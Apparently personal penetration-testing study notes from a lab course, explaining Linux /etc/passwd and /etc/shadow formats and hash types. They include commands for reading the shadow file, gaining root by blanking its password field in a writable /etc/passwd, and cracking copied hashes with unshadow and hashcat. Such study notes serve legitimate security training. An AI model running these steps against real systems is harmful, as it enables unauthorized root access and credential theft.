Monty's Pentesting Notes | Obsidian

    Linux Authentication

    Table of Contents

    Linux /etc/passwd

    > cat /etc/passwd

...SNIP...
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash
    <username><password><uid><gid><comment><home directory><cmd executed after logging in>
    htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash
    if /etc/passwd is writable by mistake,

    Editing /etc/passwd - Before

    root:x:0:0:root:/root:/bin/bash

    Editing /etc/passwd - After

    root::0:0:root:/root:/bin/bash

    then, we can log into root without password

    [cry0l1t3@parrot]─[~]$ head -n 1 /etc/passwd

root::0:0:root:/root:/bin/bash


[cry0l1t3@parrot]─[~]$ su

[root@parrot]─[/home/cry0l1t3]#

    Linux /etc/shadow

    root@htb:~# cat /etc/shadow

...SNIP...
htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7:::

    breakdown:

    <username>:<encrypted password>:<day of last change>:<min age>:<max age>:<warning period>:<inactivity period>:<expiration date>:<reserved field>
    htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7::::

    breakdown of the password:

    $ <id>$ <salt>$ <hashed>
    $ y$ j9T$ 3QSBB6CbHEu...SNIP...f8Ms

    what each <id> correspond to:

    IDCryptographic Hash Algorithm
    $1$MD5
    $2a$Blowfish
    $5$SHA-256
    $6$SHA-512
    $sha1$SHA1crypt
    $y$Yescrypt
    $gy$Gost-yescrypt
    $7$Scrypt

    Opasswd

    stores old password; needs admin rights to read /etc/security/opasswd

    Cracking Linux Credentials

    1. Unshadow

    sudo cp /etc/passwd /tmp/passwd.bak 

    sudo cp /etc/shadow /tmp/shadow.bak 

    unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

    2. Hashcat - Cracking Unshadowed Hashes

    hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

    Or if md5 Hashcat - Cracking MD5 Hashes

    > cat md5-hashes.list

qNDkF0zJ3v8ylCOrKB0kt0
E9uMSmiQeRh4pAAgzuvkq1

    hashcat -m 500 -a 0 md5-hashes.list rockyou.txt